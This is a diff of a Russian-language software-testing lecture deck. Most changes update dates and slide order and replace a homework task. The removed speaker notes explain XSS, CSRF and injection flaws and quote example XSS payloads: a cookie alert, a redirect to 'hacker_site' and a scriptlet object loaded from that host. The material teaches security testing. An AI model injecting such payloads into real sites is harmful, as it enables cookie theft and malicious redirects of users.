--- a/inna/Занятие3/Занятие 3.pptx
+++ b/inna/Занятие3/Занятие 3.pptx
@@ -218,7 +218,7 @@
             <a:fld id="{7FCDCAFE-ED6D-40DE-BB2A-6C2FAE0E1B23}" type="datetimeFigureOut">
               <a:rPr lang="en-US" smtClean="0"/>
               <a:pPr/>
-              <a:t>12-Jan-15</a:t>
+              <a:t>17-Jan-15</a:t>
             </a:fld>
             <a:endParaRPr lang="en-US"/>
           </a:p>
@@ -3864,14 +3864,6 @@
               </a:rPr>
               <a:t>3</a:t>
             </a:r>
-            <a:endParaRPr lang="ru-RU" sz="1200" b="0" i="0" kern="1200" dirty="0" smtClean="0">
-              <a:solidFill>
-                <a:schemeClr val="tx1"/>
-              </a:solidFill>
-              <a:latin typeface="+mn-lt"/>
-              <a:ea typeface="+mn-ea"/>
-              <a:cs typeface="+mn-cs"/>
-            </a:endParaRPr>
           </a:p>
           <a:p>
             <a:endParaRPr lang="ru-RU" sz="1200" b="0" i="0" kern="1200" dirty="0" smtClean="0">
@@ -5076,7 +5068,6 @@
               <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
               <a:t>How many eggs can be taken on an empty stomach?</a:t>
             </a:r>
-            <a:endParaRPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
           </a:p>
           <a:p>
             <a:endParaRPr lang="ru-RU" dirty="0"/>
@@ -5297,7 +5288,7 @@
             <a:fld id="{1D8BD707-D9CF-40AE-B4C6-C98DA3205C09}" type="datetimeFigureOut">
               <a:rPr lang="en-US" smtClean="0"/>
               <a:pPr/>
-              <a:t>12-Jan-15</a:t>
+              <a:t>17-Jan-15</a:t>
             </a:fld>
             <a:endParaRPr lang="en-US"/>
           </a:p>
@@ -5464,7 +5455,7 @@
             <a:fld id="{1D8BD707-D9CF-40AE-B4C6-C98DA3205C09}" type="datetimeFigureOut">
               <a:rPr lang="en-US" smtClean="0"/>
               <a:pPr/>
-              <a:t>12-Jan-15</a:t>
+              <a:t>17-Jan-15</a:t>
             </a:fld>
             <a:endParaRPr lang="en-US"/>
           </a:p>
@@ -5641,7 +5632,7 @@
             <a:fld id="{1D8BD707-D9CF-40AE-B4C6-C98DA3205C09}" type="datetimeFigureOut">
               <a:rPr lang="en-US" smtClean="0"/>
               <a:pPr/>
-              <a:t>12-Jan-15</a:t>
+              <a:t>17-Jan-15</a:t>
             </a:fld>
             <a:endParaRPr lang="en-US"/>
           </a:p>
@@ -5808,7 +5799,7 @@
             <a:fld id="{1D8BD707-D9CF-40AE-B4C6-C98DA3205C09}" type="datetimeFigureOut">
               <a:rPr lang="en-US" smtClean="0"/>
               <a:pPr/>
-              <a:t>12-Jan-15</a:t>
+              <a:t>17-Jan-15</a:t>
             </a:fld>
             <a:endParaRPr lang="en-US"/>
           </a:p>
@@ -6051,7 +6042,7 @@
             <a:fld id="{1D8BD707-D9CF-40AE-B4C6-C98DA3205C09}" type="datetimeFigureOut">
               <a:rPr lang="en-US" smtClean="0"/>
               <a:pPr/>
-              <a:t>12-Jan-15</a:t>
+              <a:t>17-Jan-15</a:t>
             </a:fld>
             <a:endParaRPr lang="en-US"/>
           </a:p>
@@ -6336,7 +6327,7 @@
             <a:fld id="{1D8BD707-D9CF-40AE-B4C6-C98DA3205C09}" type="datetimeFigureOut">
               <a:rPr lang="en-US" smtClean="0"/>
               <a:pPr/>
-              <a:t>12-Jan-15</a:t>
+              <a:t>17-Jan-15</a:t>
             </a:fld>
             <a:endParaRPr lang="en-US"/>
           </a:p>
@@ -6755,7 +6746,7 @@
             <a:fld id="{1D8BD707-D9CF-40AE-B4C6-C98DA3205C09}" type="datetimeFigureOut">
               <a:rPr lang="en-US" smtClean="0"/>
               <a:pPr/>
-              <a:t>12-Jan-15</a:t>
+              <a:t>17-Jan-15</a:t>
             </a:fld>
             <a:endParaRPr lang="en-US"/>
           </a:p>
@@ -6870,7 +6861,7 @@
             <a:fld id="{1D8BD707-D9CF-40AE-B4C6-C98DA3205C09}" type="datetimeFigureOut">
               <a:rPr lang="en-US" smtClean="0"/>
               <a:pPr/>
-              <a:t>12-Jan-15</a:t>
+              <a:t>17-Jan-15</a:t>
             </a:fld>
             <a:endParaRPr lang="en-US"/>
           </a:p>
@@ -6962,7 +6953,7 @@
             <a:fld id="{1D8BD707-D9CF-40AE-B4C6-C98DA3205C09}" type="datetimeFigureOut">
               <a:rPr lang="en-US" smtClean="0"/>
               <a:pPr/>
-              <a:t>12-Jan-15</a:t>
+              <a:t>17-Jan-15</a:t>
             </a:fld>
             <a:endParaRPr lang="en-US"/>
           </a:p>
@@ -7236,7 +7227,7 @@
             <a:fld id="{1D8BD707-D9CF-40AE-B4C6-C98DA3205C09}" type="datetimeFigureOut">
               <a:rPr lang="en-US" smtClean="0"/>
               <a:pPr/>
-              <a:t>12-Jan-15</a:t>
+              <a:t>17-Jan-15</a:t>
             </a:fld>
             <a:endParaRPr lang="en-US"/>
           </a:p>
@@ -7486,7 +7477,7 @@
             <a:fld id="{1D8BD707-D9CF-40AE-B4C6-C98DA3205C09}" type="datetimeFigureOut">
               <a:rPr lang="en-US" smtClean="0"/>
               <a:pPr/>
-              <a:t>12-Jan-15</a:t>
+              <a:t>17-Jan-15</a:t>
             </a:fld>
             <a:endParaRPr lang="en-US"/>
           </a:p>
@@ -7705,7 +7696,7 @@
             <a:fld id="{1D8BD707-D9CF-40AE-B4C6-C98DA3205C09}" type="datetimeFigureOut">
               <a:rPr lang="en-US" smtClean="0"/>
               <a:pPr/>
-              <a:t>12-Jan-15</a:t>
+              <a:t>17-Jan-15</a:t>
             </a:fld>
             <a:endParaRPr lang="en-US"/>
           </a:p>
@@ -8317,7 +8308,7 @@
         <p:spPr>
           <a:xfrm>
             <a:off x="683568" y="3923764"/>
-            <a:ext cx="6336704" cy="646331"/>
+            <a:ext cx="6336704" cy="369332"/>
           </a:xfrm>
           <a:prstGeom prst="rect">
             <a:avLst/>
@@ -8331,7 +8322,15 @@
           <a:p>
             <a:r>
               <a:rPr lang="en-US" b="1" dirty="0" smtClean="0"/>
-              <a:t>Describe all possible tests for a pen. Use knowledge from the lesson </a:t>
+              <a:t>Describe and perform smoke tests for the </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" b="1" dirty="0" err="1" smtClean="0"/>
+              <a:t>ListBoxer</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" b="1" smtClean="0"/>
+              <a:t> program</a:t>
             </a:r>
             <a:endParaRPr lang="en-US" b="1" dirty="0"/>
           </a:p>
@@ -8397,7 +8396,6 @@
               <a:rPr lang="en-US" b="1" i="1" dirty="0" smtClean="0"/>
               <a:t>Regression testing, security testing, performance testing, stress testing, load testing, volume testing, white-box testing, black-box testing, smoke testing, usability testing, functional testing</a:t>
             </a:r>
-            <a:endParaRPr lang="en-US" b="1" i="1" dirty="0" smtClean="0"/>
           </a:p>
         </p:txBody>
       </p:sp>

--- a/inna/Занятие3/Занятие 3.pptx
+++ b/inna/Занятие3/Занятие 3.pptx
@@ -5,7 +5,7 @@
     <p:sldMasterId id="2147483648" r:id="rId1"/>
   </p:sldMasterIdLst>
   <p:notesMasterIdLst>
-    <p:notesMasterId r:id="rId12"/>
+    <p:notesMasterId r:id="rId14"/>
   </p:notesMasterIdLst>
   <p:sldIdLst>
     <p:sldId id="280" r:id="rId2"/>
@@ -13,11 +13,13 @@
     <p:sldId id="281" r:id="rId4"/>
     <p:sldId id="336" r:id="rId5"/>
     <p:sldId id="337" r:id="rId6"/>
-    <p:sldId id="338" r:id="rId7"/>
-    <p:sldId id="339" r:id="rId8"/>
-    <p:sldId id="340" r:id="rId9"/>
-    <p:sldId id="341" r:id="rId10"/>
-    <p:sldId id="286" r:id="rId11"/>
+    <p:sldId id="342" r:id="rId7"/>
+    <p:sldId id="343" r:id="rId8"/>
+    <p:sldId id="338" r:id="rId9"/>
+    <p:sldId id="339" r:id="rId10"/>
+    <p:sldId id="340" r:id="rId11"/>
+    <p:sldId id="341" r:id="rId12"/>
+    <p:sldId id="286" r:id="rId13"/>
   </p:sldIdLst>
   <p:sldSz cx="9144000" cy="6858000" type="screen4x3"/>
   <p:notesSz cx="6858000" cy="9144000"/>
@@ -118,7 +120,7 @@
   </p:defaultTextStyle>
   <p:extLst>
     <p:ext uri="{EFAFB233-063F-42B5-8137-9DF3F51BA10A}">
-      <p15:sldGuideLst xmlns="" xmlns:p15="http://schemas.microsoft.com/office/powerpoint/2012/main">
+      <p15:sldGuideLst xmlns:p15="http://schemas.microsoft.com/office/powerpoint/2012/main" xmlns="">
         <p15:guide id="1" orient="horz" pos="2160">
           <p15:clr>
             <a:srgbClr val="A4A3A4"/>
@@ -387,7 +389,7 @@
     </p:spTree>
     <p:extLst>
       <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
-        <p14:creationId xmlns="" xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="616035265"/>
+        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" xmlns="" val="616035265"/>
       </p:ext>
     </p:extLst>
   </p:cSld>
@@ -695,45 +697,6 @@
             <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
           </a:p>
           <a:p>
-            <a:r>
-              <a:rPr lang="ru-RU" dirty="0" smtClean="0"/>
-              <a:t>С развитием сетевых технологий и интернета взаимодействие разных систем, сервисов и приложений друг с другом приобрело значительную актуальность, так как любые связанные с этим проблемы могут привести к падению авторитета компании, что как следствие повлечет за собой финансовые потери. Поэтому к тестированию взаимодействия стоит подходить со всей серьезностью.</a:t>
-            </a:r>
-          </a:p>
-          <a:p>
-            <a:r>
-              <a:rPr lang="ru-RU" b="1" dirty="0" smtClean="0"/>
-              <a:t>Тестирование взаимодействия</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="ru-RU" dirty="0" smtClean="0"/>
-              <a:t> (</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="ru-RU" b="1" dirty="0" err="1" smtClean="0"/>
-              <a:t>Interoperability</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="ru-RU" b="1" dirty="0" smtClean="0"/>
-              <a:t> </a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="ru-RU" b="1" dirty="0" err="1" smtClean="0"/>
-              <a:t>Testing</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="ru-RU" dirty="0" smtClean="0"/>
-              <a:t>) – это функциональное тестирование, проверяющее способность приложения взаимодействовать с одним и более компонентами или системами.</a:t>
-            </a:r>
-          </a:p>
-          <a:p>
-            <a:r>
-              <a:rPr lang="ru-RU" dirty="0" smtClean="0"/>
-              <a:t>Программное обеспечение с хорошими характеристиками взаимодействия может быть легко интегрировано с другими системами, не требуя каких-либо серьезных модификаций. В этом случае, количество изменений и время, требуемое на их выполнение, могут быть использованы для измерения возможности взаимодействия. </a:t>
-            </a:r>
-            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
-          </a:p>
-          <a:p>
             <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
           </a:p>
           <a:p>
@@ -878,985 +841,7 @@
             <a:endParaRPr lang="ru-RU" dirty="0" smtClean="0"/>
           </a:p>
           <a:p>
-            <a:r>
-              <a:rPr lang="ru-RU" b="1" dirty="0" smtClean="0"/>
-              <a:t>Тестирование безопасности</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="ru-RU" dirty="0" smtClean="0"/>
-              <a:t> - это стратегия тестирования, используемая для проверки безопасности системы, а также для анализа рисков, связанных с обеспечением целостного подхода к защите приложения, атак хакеров, вирусов, несанкционированного доступа к конфиденциальным данным.</a:t>
-            </a:r>
-          </a:p>
-          <a:p>
-            <a:r>
-              <a:rPr lang="ru-RU" dirty="0" smtClean="0"/>
-              <a:t>Общая стратегия безопасности основывается на трех основных принципах:</a:t>
-            </a:r>
-          </a:p>
-          <a:p>
-            <a:r>
-              <a:rPr lang="ru-RU" dirty="0" smtClean="0"/>
-              <a:t>• конфиденциальность</a:t>
-            </a:r>
-          </a:p>
-          <a:p>
-            <a:r>
-              <a:rPr lang="ru-RU" dirty="0" smtClean="0"/>
-              <a:t>• целостность</a:t>
-            </a:r>
-          </a:p>
-          <a:p>
-            <a:r>
-              <a:rPr lang="ru-RU" dirty="0" smtClean="0"/>
-              <a:t>• доступность</a:t>
-            </a:r>
-          </a:p>
-          <a:p>
-            <a:r>
-              <a:rPr lang="ru-RU" dirty="0" smtClean="0"/>
-              <a:t>В настоящее время наиболее распространенными видами </a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="ru-RU" b="1" dirty="0" smtClean="0"/>
-              <a:t>уязвимости в безопасности программного обеспечения</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="ru-RU" dirty="0" smtClean="0"/>
-              <a:t> являются:</a:t>
-            </a:r>
-          </a:p>
-          <a:p>
-            <a:r>
-              <a:rPr lang="ru-RU" dirty="0" smtClean="0"/>
-              <a:t>• </a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="ru-RU" b="1" dirty="0" smtClean="0"/>
-              <a:t>XSS (</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="ru-RU" b="1" dirty="0" err="1" smtClean="0"/>
-              <a:t>Cross-Site</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="ru-RU" b="1" dirty="0" smtClean="0"/>
-              <a:t> </a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="ru-RU" b="1" dirty="0" err="1" smtClean="0"/>
-              <a:t>Scripting</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="ru-RU" b="1" dirty="0" smtClean="0"/>
-              <a:t>)</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="ru-RU" dirty="0" smtClean="0"/>
-              <a:t> - это вид уязвимости программного обеспечения (</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="ru-RU" dirty="0" err="1" smtClean="0"/>
-              <a:t>Web</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="ru-RU" dirty="0" smtClean="0"/>
-              <a:t> приложений), при которой, на генерированной сервером странице, выполняются вредоносные </a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="ru-RU" dirty="0" err="1" smtClean="0"/>
-              <a:t>скрипты</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="ru-RU" dirty="0" smtClean="0"/>
-              <a:t>, с целью атаки клиента.</a:t>
-            </a:r>
-          </a:p>
-          <a:p>
-            <a:r>
-              <a:rPr lang="ru-RU" dirty="0" smtClean="0"/>
-              <a:t>• </a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="ru-RU" b="1" dirty="0" smtClean="0"/>
-              <a:t>XSRF / CSRF (</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="ru-RU" b="1" dirty="0" err="1" smtClean="0"/>
-              <a:t>Request</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="ru-RU" b="1" dirty="0" smtClean="0"/>
-              <a:t> </a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="ru-RU" b="1" dirty="0" err="1" smtClean="0"/>
-              <a:t>Forgery</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="ru-RU" b="1" dirty="0" smtClean="0"/>
-              <a:t>)</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="ru-RU" dirty="0" smtClean="0"/>
-              <a:t> - это вид уязвимости, позволяющий использовать недостатки HTTP протокола, при этом злоумышленники работают по следующей схеме: ссылка на вредоносный сайт </a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="ru-RU" dirty="0" err="1" smtClean="0"/>
-              <a:t>установливается</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="ru-RU" dirty="0" smtClean="0"/>
-              <a:t> на странице, пользующейся доверием у пользователя, при переходе по вредоносной ссылке выполняется </a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="ru-RU" dirty="0" err="1" smtClean="0"/>
-              <a:t>скрипт</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="ru-RU" dirty="0" smtClean="0"/>
-              <a:t>, сохраняющий личные данные пользователя (пароли, платежные данные и т.д.), либо отправляющий СПАМ сообщения от лица пользователя, либо изменяет доступ к учетной записи пользователя, для получения полного контроля над ней.</a:t>
-            </a:r>
-          </a:p>
-          <a:p>
-            <a:r>
-              <a:rPr lang="ru-RU" dirty="0" smtClean="0"/>
-              <a:t>• </a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="ru-RU" b="1" dirty="0" err="1" smtClean="0"/>
-              <a:t>Code</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="ru-RU" b="1" dirty="0" smtClean="0"/>
-              <a:t> </a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="ru-RU" b="1" dirty="0" err="1" smtClean="0"/>
-              <a:t>injections</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="ru-RU" b="1" dirty="0" smtClean="0"/>
-              <a:t> (SQL, PHP, ASP и т.д.)</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="ru-RU" dirty="0" smtClean="0"/>
-              <a:t> - это вид уязвимости, при котором становится возможно осуществить запуск исполняемого кода с целью получения доступа к системным ресурсам, несанкционированного доступа к данным либо выведения системы из строя.</a:t>
-            </a:r>
-          </a:p>
-          <a:p>
-            <a:r>
-              <a:rPr lang="ru-RU" dirty="0" smtClean="0"/>
-              <a:t>• </a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="ru-RU" b="1" dirty="0" err="1" smtClean="0"/>
-              <a:t>Server-Side</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="ru-RU" b="1" dirty="0" smtClean="0"/>
-              <a:t> </a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="ru-RU" b="1" dirty="0" err="1" smtClean="0"/>
-              <a:t>Includes</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="ru-RU" b="1" dirty="0" smtClean="0"/>
-              <a:t> (SSI) </a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="ru-RU" b="1" dirty="0" err="1" smtClean="0"/>
-              <a:t>Injection</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="ru-RU" dirty="0" smtClean="0"/>
-              <a:t> - это вид уязвимости, использующий вставку серверных команд в HTML код или запуск их напрямую с сервера.</a:t>
-            </a:r>
-          </a:p>
-          <a:p>
-            <a:r>
-              <a:rPr lang="ru-RU" dirty="0" smtClean="0"/>
-              <a:t>• </a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="ru-RU" b="1" dirty="0" err="1" smtClean="0"/>
-              <a:t>Authorization</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="ru-RU" b="1" dirty="0" smtClean="0"/>
-              <a:t> </a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="ru-RU" b="1" dirty="0" err="1" smtClean="0"/>
-              <a:t>Bypass</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="ru-RU" dirty="0" smtClean="0"/>
-              <a:t> - это вид уязвимости, при котором возможно получить несанкционированный доступ к учетной записи или документам другого пользователя</a:t>
-            </a:r>
-          </a:p>
-          <a:p>
-            <a:r>
-              <a:rPr lang="ru-RU" dirty="0" smtClean="0"/>
-              <a:t/>
-            </a:r>
-            <a:br>
-              <a:rPr lang="ru-RU" dirty="0" smtClean="0"/>
-            </a:br>
-            <a:r>
-              <a:rPr lang="ru-RU" b="1" dirty="0" smtClean="0"/>
-              <a:t>Как тестировать ПО на безопасность?</a:t>
-            </a:r>
-          </a:p>
-          <a:p>
-            <a:r>
-              <a:rPr lang="ru-RU" dirty="0" smtClean="0"/>
-              <a:t>Приведем примеры тестирования ПО на предмет уязвимости в системе безопасности. Для этого Вам необходимо проверить Ваше программное обеспечение на наличия известных видов уязвимостей:</a:t>
-            </a:r>
-          </a:p>
-          <a:p>
-            <a:r>
-              <a:rPr lang="ru-RU" b="1" dirty="0" smtClean="0"/>
-              <a:t>XSS (</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="ru-RU" b="1" dirty="0" err="1" smtClean="0"/>
-              <a:t>Cross-Site</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="ru-RU" b="1" dirty="0" smtClean="0"/>
-              <a:t> </a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="ru-RU" b="1" dirty="0" err="1" smtClean="0"/>
-              <a:t>Scripting</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="ru-RU" b="1" dirty="0" smtClean="0"/>
-              <a:t>)</a:t>
-            </a:r>
-          </a:p>
-          <a:p>
-            <a:r>
-              <a:rPr lang="ru-RU" dirty="0" smtClean="0"/>
-              <a:t>Сами по себе XSS атаки могут быть очень разнообразными. Злоумышленники могут попытаться украсть ваши </a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="ru-RU" dirty="0" err="1" smtClean="0"/>
-              <a:t>куки</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="ru-RU" dirty="0" smtClean="0"/>
-              <a:t>, перенаправить вас на сайт, где произойдет более серьезная атака, загрузить в память какой-либо вредоносный объект и т.д., всего </a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="ru-RU" dirty="0" err="1" smtClean="0"/>
-              <a:t>навсего</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="ru-RU" dirty="0" smtClean="0"/>
-              <a:t> </a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="ru-RU" b="1" dirty="0" smtClean="0"/>
-              <a:t>разместив вредоносный </a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="ru-RU" b="1" dirty="0" err="1" smtClean="0"/>
-              <a:t>скрипт</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="ru-RU" dirty="0" smtClean="0"/>
-              <a:t> у вас на сайте. Как пример, можно рассмотреть следующий </a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="ru-RU" dirty="0" err="1" smtClean="0"/>
-              <a:t>скрипт</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="ru-RU" dirty="0" smtClean="0"/>
-              <a:t>, выводящий на экран ваши </a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="ru-RU" dirty="0" err="1" smtClean="0"/>
-              <a:t>куки</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="ru-RU" dirty="0" smtClean="0"/>
-              <a:t>:</a:t>
-            </a:r>
-          </a:p>
-          <a:p>
-            <a:r>
-              <a:rPr lang="ru-RU" dirty="0" smtClean="0"/>
-              <a:t>&lt;</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="ru-RU" dirty="0" err="1" smtClean="0"/>
-              <a:t>script</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="ru-RU" dirty="0" smtClean="0"/>
-              <a:t>&gt;</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="ru-RU" dirty="0" err="1" smtClean="0"/>
-              <a:t>alert</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="ru-RU" dirty="0" smtClean="0"/>
-              <a:t>(</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="ru-RU" dirty="0" err="1" smtClean="0"/>
-              <a:t>document.cookie</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="ru-RU" dirty="0" smtClean="0"/>
-              <a:t>);&lt;/</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="ru-RU" dirty="0" err="1" smtClean="0"/>
-              <a:t>script</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="ru-RU" dirty="0" smtClean="0"/>
-              <a:t>&gt;</a:t>
-            </a:r>
-          </a:p>
-          <a:p>
-            <a:r>
-              <a:rPr lang="ru-RU" dirty="0" smtClean="0"/>
-              <a:t>либо </a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="ru-RU" dirty="0" err="1" smtClean="0"/>
-              <a:t>скрипт</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="ru-RU" dirty="0" smtClean="0"/>
-              <a:t> делающий </a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="ru-RU" dirty="0" err="1" smtClean="0"/>
-              <a:t>редирект</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="ru-RU" dirty="0" smtClean="0"/>
-              <a:t> на зараженную страницу:</a:t>
-            </a:r>
-          </a:p>
-          <a:p>
-            <a:r>
-              <a:rPr lang="ru-RU" dirty="0" smtClean="0"/>
-              <a:t>&lt;</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="ru-RU" dirty="0" err="1" smtClean="0"/>
-              <a:t>script</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="ru-RU" dirty="0" smtClean="0"/>
-              <a:t>&gt;</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="ru-RU" dirty="0" err="1" smtClean="0"/>
-              <a:t>window.parent.location.href='http</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="ru-RU" dirty="0" smtClean="0"/>
-              <a:t>://</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="ru-RU" dirty="0" err="1" smtClean="0"/>
-              <a:t>hacker_site</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="ru-RU" dirty="0" smtClean="0"/>
-              <a:t>';&lt;/</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="ru-RU" dirty="0" err="1" smtClean="0"/>
-              <a:t>script</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="ru-RU" dirty="0" smtClean="0"/>
-              <a:t>&gt;</a:t>
-            </a:r>
-          </a:p>
-          <a:p>
-            <a:r>
-              <a:rPr lang="ru-RU" dirty="0" smtClean="0"/>
-              <a:t>либо создающий вредоносный объект с вирусом и т.п.:</a:t>
-            </a:r>
-          </a:p>
-          <a:p>
-            <a:r>
-              <a:rPr lang="ru-RU" dirty="0" smtClean="0"/>
-              <a:t>&lt;</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="ru-RU" dirty="0" err="1" smtClean="0"/>
-              <a:t>object</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="ru-RU" dirty="0" smtClean="0"/>
-              <a:t> </a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="ru-RU" dirty="0" err="1" smtClean="0"/>
-              <a:t>type=</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="ru-RU" dirty="0" smtClean="0"/>
-              <a:t>"</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="ru-RU" dirty="0" err="1" smtClean="0"/>
-              <a:t>text</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="ru-RU" dirty="0" smtClean="0"/>
-              <a:t>/</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="ru-RU" dirty="0" err="1" smtClean="0"/>
-              <a:t>x-scriptlet</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="ru-RU" dirty="0" smtClean="0"/>
-              <a:t>" </a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="ru-RU" dirty="0" err="1" smtClean="0"/>
-              <a:t>data=</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="ru-RU" dirty="0" smtClean="0"/>
-              <a:t>"http://hacker_site"&gt;&lt;/object&gt;</a:t>
-            </a:r>
-          </a:p>
-          <a:p>
-            <a:r>
-              <a:rPr lang="ru-RU" dirty="0" smtClean="0"/>
-              <a:t>Для просмотра большего количества примеров рекомендуем посетить страничку: </a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="ru-RU" dirty="0" smtClean="0">
-                <a:hlinkClick r:id="rId4"/>
-              </a:rPr>
-              <a:t>XSS (</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="ru-RU" dirty="0" err="1" smtClean="0">
-                <a:hlinkClick r:id="rId4"/>
-              </a:rPr>
-              <a:t>Cross</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="ru-RU" dirty="0" smtClean="0">
-                <a:hlinkClick r:id="rId4"/>
-              </a:rPr>
-              <a:t> </a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="ru-RU" dirty="0" err="1" smtClean="0">
-                <a:hlinkClick r:id="rId4"/>
-              </a:rPr>
-              <a:t>Site</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="ru-RU" dirty="0" smtClean="0">
-                <a:hlinkClick r:id="rId4"/>
-              </a:rPr>
-              <a:t> </a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="ru-RU" dirty="0" err="1" smtClean="0">
-                <a:hlinkClick r:id="rId4"/>
-              </a:rPr>
-              <a:t>Scripting</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="ru-RU" dirty="0" smtClean="0">
-                <a:hlinkClick r:id="rId4"/>
-              </a:rPr>
-              <a:t>)... </a:t>
-            </a:r>
             <a:endParaRPr lang="ru-RU" dirty="0" smtClean="0"/>
-          </a:p>
-          <a:p>
-            <a:r>
-              <a:rPr lang="ru-RU" b="1" dirty="0" smtClean="0"/>
-              <a:t>XSRF / CSRF (</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="ru-RU" b="1" dirty="0" err="1" smtClean="0"/>
-              <a:t>Request</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="ru-RU" b="1" dirty="0" smtClean="0"/>
-              <a:t> </a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="ru-RU" b="1" dirty="0" err="1" smtClean="0"/>
-              <a:t>Forgery</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="ru-RU" b="1" dirty="0" smtClean="0"/>
-              <a:t>)</a:t>
-            </a:r>
-          </a:p>
